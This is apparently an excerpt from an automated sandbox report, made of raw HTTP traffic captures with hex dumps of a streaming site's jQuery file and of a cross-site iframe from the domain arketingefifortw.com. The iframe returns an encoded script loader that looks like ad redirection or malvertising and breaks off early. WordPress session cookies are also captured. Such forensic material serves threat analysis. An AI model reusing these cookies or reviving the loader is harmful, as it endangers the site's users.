                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 76 be 9d 2c 67 78 d6 8d 89 c8 e7 62 b3 c6 9d 51 56 ad 2c 6f e4 d5 63 f3 2d 49 e5 6d f2 2a 92 f1 01 e5 af 2a 7e 31 52 99 19 49 9a ac d2 91 b5 aa 92 4c a8 c2 1a b6 20 65 7c b7 a7 99 4f 34 8b 49 90 fe 54 2b c9 5c 4d 89 a6 59 5d 88 96 95 c7 1b 1d 4a ac b3 94 54 35 5a 7a e2 39 3f 6a b2 3c e4 7b 95 1c bd 0f f4 9f 41 e9 fe 3d 0f c6 0c 4c 6f 9f 41 ea 3f a8 fa 1c 6f 9f fd 0f ff c4 00 2b 11 00 02 02 02 02 02 02 01 04 02 02 03 00 00 00 00 01 02 03 04 00 11 05 12 13 21 06 31 22 10 14 23 41 16 32 15 42 34 52 61 ff da 00 08 01 02 01 01 08 00 10 29 fb 4a bd a4 e8 b0 71 7a 91 96 40 9e 20 34 a4 11 bc 0b bc e8 3f b8 27 2d e5 0d 5a c1 ed d9 e2 bb 27 9c 17 b8 f2 03 18 8e 1b 2e 27 56 92 3b 32 79 95 cc 33 91 2f e7 15 8f 1c bb 7f dd 3f 94 48 5c ed 8e ec 39 10 31 5a b6 d9 5d 81
                                                                                                                                                                                          Data Ascii: v,gxbQV,oc-Im**~1RIL e|O4IT+\MY]JT5Zz9?j<{A=LoA?o+!1"#A2B4Ra)Jqz@ 4?'-Z'.'V;2y3/?H\91Z]
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: f6 0d 80 90 db 55 b5 29 8f 61 6d 48 85 93 15 97 b8 66 9d bb fe 4c 8a 4e 70 c8 1f d1 92 ab 33 9c 4a ca 18 2e 08 e3 8c 02 dc 8d 54 b9 28 93 23 8d d3 40 b0 98 8e a2 3a fd 36 41 a8 09 de 79 53 af 6c 96 cb 95 fe 28 63 90 2b 77 b8 ba 11 ae 04 f7 91 90 aa 37 62 99 2a d2 45 d9 fa 75 c6 0e 77 b5 56 00 1c e3 ad c9 0b 9d 2f 28 ef d5 58 f2 42 35 fe 33 72 43 bd 74 38 73 43 3f f9 9a d6 14 d3 7a 96 0e fd 57 14 7d 8c b8 a4 b8 c1 07 e4 35 d0 ff 00 b1 46 3b de 4d c7 2c a3 b2 bd 17 5f c5 a2 a1 b6 fc 96 ba a0 d9 13 aa 82 a4 b6 f3 cd 18 3a c9 ef 6d 35 0f ef 24 8f de 54 b9 3c d2 e9 82 e7 51 ff 00 62 ea 48 23 44 60 fa c7 ae 0b 76 2b 4d 17 3c 0b ad 67 50 08 c5 24 fa c2 a0 8d 11 18 19 69 5f c4 1d 5a d2 b1 1b 82 c9 96 32 86 58 98 a3 0c 86 16 85 d3 72 74 46 ea 60 ba 52 45 ea 3e b5
                                                                                                                                                                                          Data Ascii: U)amHfLNp3J.T(#@:6AySl(c+w7b*EuwV/(XB53rCt8sC?zW}5F;M,_:m5$T<QbH#D`v+M<gP$i_Z2XrtF`RE>
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1378INData Raw: 4f 6c 3a 75 5f 64 ea 54 fe 1e 2e be cf 3e f3 5d 7f c2 30 a7 dc 06 12 26 b9 ab 21 f2 f1 9b 09 c7 b2 2f c8 e3 3b 16 91 c8 dc 7d d2 69 1c 7e 06 cd 5c 3a f0 84 66 ba f5 d7 66 59 12 ec 0b c8 d1 9d bb b5 df ad 02 b8 25 a1 81 c9 dc 61 9b 3b fe 9e 39 d4 66 ba f3 11 8a c1 41 a1 84 8d 28 83 34 a0 45 5c b6 d4 79 e7 38 55 e7 22 c6 d5 50 ce d3 4b d2 45 7f c7 1a 50 8f f4 16 36 9f 21 f2 2c ea bc 83 47 27 b1 37 72 41 2d 77 61 c1 7d da a7 0a 3f e4 2d f9 ca 51 9d bb 30 fc e4 3f d6 32 a7 f0 81 b6 1a 6d fe 3f 17 b2 3a 32 9b dc 63 4f b3 70 61 15 25 4a ef eb 03 d5 97 67 61 0e 8b 32 b9 3f 6b 63 bf 62 78 eb c0 e0 10 78 c2 b9 d3 29 1e ce a3 0e b0 0e 17 06 a2 b3 32 99 6b 29 1c 99 b7 ac 77 ea 4b e7 ff 00 74 d4 8e 1d 2d ac cc 3b 87 47 07 d4 b6 88 60 31 ff 00 d3 cb 6d 06 4f b4 31 ec
                                                                                                                                                                                          Data Ascii: Ol:u_dT.>]0&!/;}i~\:ffY%a;9fA(4E\y8U"PKEP6!,G'7rA-wa}?-Q0?2m?:2cOpa%Jga2?kcbxx)2k)wKt-;G`1mO1


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          44192.168.2.1649764172.67.131.1404436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:59 UTC752OUTGET /js/disk.js?t=1589873325348 HTTP/1.1
                                                                                                                                                                                          Host: fsharetv.co
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
                                                                                                                                                                                          2024-12-15 11:37:59 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:59 GMT
                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                          Content-Length: 786922
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=1800
                                                                                                                                                                                          Last-Modified: Sat, 14 Sep 2024 03:24:17 GMT
                                                                                                                                                                                          ETag: W/"c01ea-191ee8f5868"
                                                                                                                                                                                          CF-Cache-Status: REVALIDATED
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZpNZ5xuFL3htGfcK0PDNjcHzFLklcolWijzrhbfVtFx%2F6T31PaaqWCV7Pz5C7PESrRPJTV8cUUDmcfpEgRJwJ62dvzgjZ7XSDEb4xWfMc3KmBdQ8Rc%2BrSBcQT%2FIug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f262512684c7d0b-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2026&min_rtt=2014&rtt_var=780&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=1330&delivery_rate=1379962&cwnd=227&unsent_bytes=0&cid=930371097d3118f1&ts=629&x=0"
                                                                                                                                                                                          2024-12-15 11:37:59 UTC436INData Raw: 2f 2a 21 20 64 20 32 30 32 34 2d 30 39 2d 31 34 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 6f 63 75 6d 65 6e 74 3f 65 28 74 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 65 28 74 29 7d 3a 65 28 74 29 7d 28 22 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                          Data Ascii: /*! d 2024-09-14 */!function(t,e){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=t.document?e(t,!0):function(t){if(!t.document)throw new Error("jQuery requires a window with a document");return e(t)}:e(t)}("undefine
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1369INData Raw: 6c 28 74 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 74 29 7d 2c 75 3d 65 2e 70 75 73 68 2c 72 3d 65 2e 69 6e 64 65 78 4f 66 2c 69 3d 7b 7d 2c 73 3d 69 2e 74 6f 53 74 72 69 6e 67 2c 79 3d 69 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 79 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 76 3d 7b 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 74 2e 6e 6f 64 65 54 79 70 65 7d 2c 77 3d 6b 2e 64 6f 63 75 6d 65 6e 74 2c 63 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c 6e 6f 4d 6f
                                                                                                                                                                                          Data Ascii: l(t)}:function(t){return e.concat.apply([],t)},u=e.push,r=e.indexOf,i={},s=i.toString,y=i.hasOwnProperty,a=y.toString,l=a.call(Object),v={},b=function(t){return"function"==typeof t&&"number"!=typeof t.nodeType},w=k.document,c={type:!0,src:!0,nonce:!0,noMo
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1369INData Raw: 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 43 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 74 3d 2b 74 2b 28 74 3c 30 3f 65 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 30 3c 3d 74 26 26 74 3c 65 3f 5b 74 68 69 73 5b 74 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 75 2c 73 6f 72 74 3a 65 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 65 2e 73 70 6c 69 63 65 7d 2c 43 2e
                                                                                                                                                                                          Data Ascii: return this.pushStack(C.grep(this,function(t,e){return e%2}))},eq:function(t){var e=this.length,t=+t+(t<0?e:0);return this.pushStack(0<=t&&t<e?[this[t]]:[])},end:function(){return this.prevObject||this.constructor()},push:u,sort:e.sort,splice:e.splice},C.
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1369INData Raw: 79 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 2d 31 3a 72 2e 63 61 6c 6c 28 65 2c 74 2c 6e 29 7d 2c 6d 65 72 67 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 2b 65 2e 6c 65 6e 67 74 68 2c 69 3d 30 2c 72 3d 74 2e 6c 65 6e 67 74 68 3b 69 3c 6e 3b 69 2b 2b 29 74 5b 72 2b 2b 5d 3d 65 5b 69 5d 3b 72 65 74 75 72 6e 20 74 2e 6c 65 6e 67 74 68 3d 72 2c 74 7d 2c 67 72 65 70 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 72 3d 30 2c 73 3d 74 2e 6c 65 6e 67 74 68 2c 61 3d 21 6e 3b 72 3c 73 3b 72 2b 2b 29 21 65 28 74 5b 72 5d 2c 72 29 21 3d 61 26 26 69 2e 70 75 73 68 28 74 5b 72 5d 29 3b 72 65 74 75 72 6e 20 69 7d 2c 6d 61 70 3a 66 75 6e 63
                                                                                                                                                                                          Data Ascii: y:function(t,e,n){return null==e?-1:r.call(e,t,n)},merge:function(t,e){for(var n=+e.length,i=0,r=t.length;i<n;i++)t[r++]=e[i];return t.length=r,t},grep:function(t,e,n){for(var i=[],r=0,s=t.length,a=!n;r<s;r++)!e(t[r],r)!=a&&i.push(t[r]);return i},map:func
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1369INData Raw: 3a 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 46 2b 22 29 29 7c 29 22 2b 42 2b 22 2a 5c 5c 5d 22 2c 7a 3d 22 3a 28 22 2b 46 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 48 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 71 3d 6e 65 77 20 52 65 67 45 78 70 28 42 2b 22 2b 22 2c 22 67 22 29 2c 56 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 42 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e
                                                                                                                                                                                          Data Ascii: :'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+F+"))|)"+B+"*\\]",z=":("+F+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+H+")*)|.*)\\)|)",q=new RegExp(B+"+","g"),V=new RegExp("^"+B+"+|((?:^|[^\\\\])(?:\\\\.
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1369INData Raw: 61 6c 6c 28 76 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 76 2e 63 68 69 6c 64 4e 6f 64 65 73 29 2c 65 5b 76 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 5d 2e 6e 6f 64 65 54 79 70 65 7d 63 61 74 63 68 28 74 29 7b 55 3d 7b 61 70 70 6c 79 3a 65 2e 6c 65 6e 67 74 68 3f 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 4d 2e 61 70 70 6c 79 28 74 2c 52 2e 63 61 6c 6c 28 65 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 2e 6c 65 6e 67 74 68 2c 69 3d 30 3b 74 5b 6e 2b 2b 5d 3d 65 5b 69 2b 2b 5d 3b 29 3b 74 2e 6c 65 6e 67 74 68 3d 6e 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 74 28 74 2c 65 2c 6e 2c 69 29 7b 76 61 72 20 72 2c 73 2c 61 2c 6f 2c 75 2c 6c 2c 63 2c 68 3d 65 26 26 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c
                                                                                                                                                                                          Data Ascii: all(v.childNodes),v.childNodes),e[v.childNodes.length].nodeType}catch(t){U={apply:e.length?function(t,e){M.apply(t,R.call(e))}:function(t,e){for(var n=t.length,i=0;t[n++]=e[i++];);t.length=n-1}}}function ot(t,e,n,i){var r,s,a,o,u,l,c,h=e&&e.ownerDocument,
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1369INData Raw: 65 6c 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 74 28 65 29 7d 63 61 74 63 68 28 74 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 2c 65 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 68 74 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 74 2e 73 70 6c 69 74 28 22 7c 22 29 2c 69 3d 6e 2e 6c 65 6e 67 74 68 3b 69 2d 2d 3b 29 5f 2e 61 74 74 72 48 61 6e 64 6c 65 5b 6e 5b 69 5d 5d 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 64 74 28 74 2c 65 29 7b 76 61 72 20 6e 3d 65 26 26 74 2c 69 3d 6e 26 26 31 3d 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 74 2e 73 6f 75 72 63 65 49 6e 64
                                                                                                                                                                                          Data Ascii: eldset");try{return!!t(e)}catch(t){return!1}finally{e.parentNode&&e.parentNode.removeChild(e),e=null}}function ht(t,e){for(var n=t.split("|"),i=n.length;i--;)_.attrHandle[n[i]]=e}function dt(t,e){var n=e&&t,i=n&&1===t.nodeType&&1===e.nodeType&&t.sourceInd
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1369INData Raw: 65 74 20 64 69 76 22 29 2e 6c 65 6e 67 74 68 7d 29 2c 70 2e 61 74 74 72 69 62 75 74 65 73 3d 63 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 69 22 2c 21 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 63 6c 61 73 73 4e 61 6d 65 22 29 7d 29 2c 70 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3d 63 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6b 2e 63 72 65 61 74 65 43 6f 6d 6d 65 6e 74 28 22 22 29 29 2c 21 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 2a 22 29 2e 6c 65 6e 67 74 68 7d 29 2c 70 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3d 74 74 2e 74 65 73 74 28 6b 2e 67 65
                                                                                                                                                                                          Data Ascii: et div").length}),p.attributes=ct(function(t){return t.className="i",!t.getAttribute("className")}),p.getElementsByTagName=ct(function(t){return t.appendChild(k.createComment("")),!t.getElementsByTagName("*").length}),p.getElementsByClassName=tt.test(k.ge
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1369INData Raw: 29 72 65 74 75 72 6e 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 74 29 7d 2c 6f 3d 5b 5d 2c 67 3d 5b 5d 2c 28 70 2e 71 73 61 3d 74 74 2e 74 65 73 74 28 6b 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 29 29 26 26 28 63 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 69 64 3d 27 22 2b 43 2b 22 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 69 64 3d 27 22 2b 43 2b 22 2d 5c 72 5c 5c 27 20 6d 73 61 6c 6c 6f 77 63 61 70 74 75 72 65 3d 27 27 3e 3c 6f 70 74 69 6f 6e 20 73 65 6c 65 63 74 65 64 3d 27 27 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 73 65 6c 65 63 74 3e 22 2c 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b
                                                                                                                                                                                          Data Ascii: )return e.getElementsByClassName(t)},o=[],g=[],(p.qsa=tt.test(k.querySelectorAll))&&(ct(function(t){var e;a.appendChild(t).innerHTML="<a id='"+C+"'></a><select id='"+C+"-\r\\' msallowcapture=''><option selected=''></option></select>",t.querySelectorAll("[
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1369INData Raw: 6f 72 7c 7c 61 2e 6f 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 61 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 29 29 26 26 63 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 70 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 3d 63 2e 63 61 6c 6c 28 74 2c 22 2a 22 29 2c 63 2e 63 61 6c 6c 28 74 2c 22 5b 73 21 3d 27 27 5d 3a 78 22 29 2c 6f 2e 70 75 73 68 28 22 21 3d 22 2c 7a 29 7d 29 2c 67 3d 67 2e 6c 65 6e 67 74 68 26 26 6e 65 77 20 52 65 67 45 78 70 28 67 2e 6a 6f 69 6e 28 22 7c 22 29 29 2c 6f 3d 6f 2e 6c 65 6e 67 74 68 26 26 6e 65 77 20 52 65 67 45 78 70 28 6f 2e 6a 6f 69 6e 28 22 7c 22 29 29 2c 65 3d 74 74 2e 74 65 73 74 28 61 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 29 2c 79 3d 65 7c 7c 74 74 2e 74 65 73
                                                                                                                                                                                          Data Ascii: or||a.oMatchesSelector||a.msMatchesSelector))&&ct(function(t){p.disconnectedMatch=c.call(t,"*"),c.call(t,"[s!='']:x"),o.push("!=",z)}),g=g.length&&new RegExp(g.join("|")),o=o.length&&new RegExp(o.join("|")),e=tt.test(a.compareDocumentPosition),y=e||tt.tes


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          45192.168.2.164977113.227.8.774436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:59 UTC1245OUTGET /MnB6NXdTEhlYSFNNGBMCQBxHEEV0VUhzEwAHQ1YTR0hOTRQGFQsbFF4fD1ERQB8UQVlcFQ4QRXQcN30bBiQ+WSN0GCNENVkhK30/dzk7cDV5Fh0BPmoHHRBFcCg8bzJ6GkNnImMDHnoyChU9XRNDJUp4IHQaDXATWjUNejJzNilnQhdCPHY/VVVIdz5zFxxnNn8TGWcmdCgCZANkQR5wL1scImBHYDobWR9nN0pjQ3pAK38xSxM/Yg9BJzFwD2Y2K3wQZxgjeDBqNi9tAH8iM3MhYCg/Wjx2Mk9/L2pEMHI2BiIzWUZUNB1BB3EHO20zdRs2dDJaOSNSHGQjEBgHQjMNdDh3IzNlNXQINnEfRTMpZDUENChZFGEeAmwmcxsvfiIHJj1NOl4kKGM7Yh4RfjUDFDZQH0UzKWM2XCUvZCJ0NxF5FAMIMVMxZCo/XUZCMw10EnojQ2YvAzIeUxBeJD9kGFgmPGMUYRcVfDZnRS1TNVExLAUfQjMNdDx1IwpsJloyHlMZCjYpXk5bMx1vEXYoP3xRWAMVWwcPNhJ9A0tFSlNEAzg9bTM HTTP/1.1
                                                                                                                                                                                          Host: arketingefifortw.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                          Sec-Fetch-Dest: iframe
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:00 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                          Content-Length: 3121
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:00 GMT
                                                                                                                                                                                          Accept-CH: DPR, Width, Viewport-Width, Device-Memory, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List
                                                                                                                                                                                          Set-Cookie: AWSALB=hM/tvOPtPOlBY/wPTvfp4tPOu2yQsotQQK5NGv7zQzLa3P6OaA6A7ltvQb8VHEc5l5ZJ2A0I3rmiCQ1YFfawzIczj+HhbOhmp3Q1byjExa9gCHvEfXwBSCIhl53E; Expires=Sun, 22 Dec 2024 11:38:00 GMT; Path=/
                                                                                                                                                                                          Set-Cookie: AWSALBCORS=hM/tvOPtPOlBY/wPTvfp4tPOu2yQsotQQK5NGv7zQzLa3P6OaA6A7ltvQb8VHEc5l5ZJ2A0I3rmiCQ1YFfawzIczj+HhbOhmp3Q1byjExa9gCHvEfXwBSCIhl53E; Expires=Sun, 22 Dec 2024 11:38:00 GMT; Path=/; SameSite=None
                                                                                                                                                                                          Server: openresty/1.17.8.2
                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate, no-transform
                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                          P3P: CP="NID DSP ALL COR"
                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                          Via: 1.1 8ae1228303a81d51353490d58d5c6a52.cloudfront.net (CloudFront)
                                                                                                                                                                                          X-Amz-Cf-Pop: BAH53-C1
                                                                                                                                                                                          X-Amz-Cf-Id: ot_XmD_V55Ax9ZRuooQxxTs6Ks4TtbOuIAHT5d-QriXE8qQWRqQ03w==
                                                                                                                                                                                          2024-12-15 11:38:00 UTC3121INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 46 39 79 79 79 79 2e 49 3d 27 2f 2f 64 32 77 39 63 64 75 38 34 78 63 34 65 71 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 6c 4d 48 6c 34 54 44 6c 54 46 68 59 71 42 6b 51 51 48 48 45 49 41 45 42 4b 66 67 34 49 58 77 67 2b 58 46 5a 45 48 6a 39 52 55 51 73 64 4f 45 38 65 47 68 64 71 55 30 4d 57 46 6a 77 45 64 68 45 77 4f 45 41 46 53 52 35 2f 43 48 67 2b 49 41 67 66 52 41 4d 63 63 52 51 46 58 78 51 74 56 31 64 45 58 69 6c 58 55 30 52 4a 61 6c 68 55 47 30 56 34 48 30 51 4a 46 79 63 45 57 78 73 57 4b 45 78 54 46 51 49 67 55 68 59 4d 47 58 46 55 58 77 4d 52 49 46 56 52 58 45 6f 4b 44 42 35 4a 58 58 34 4a 47 41 34 52 49 6c 31 66 44 67 74 70 43 77 41 58 44
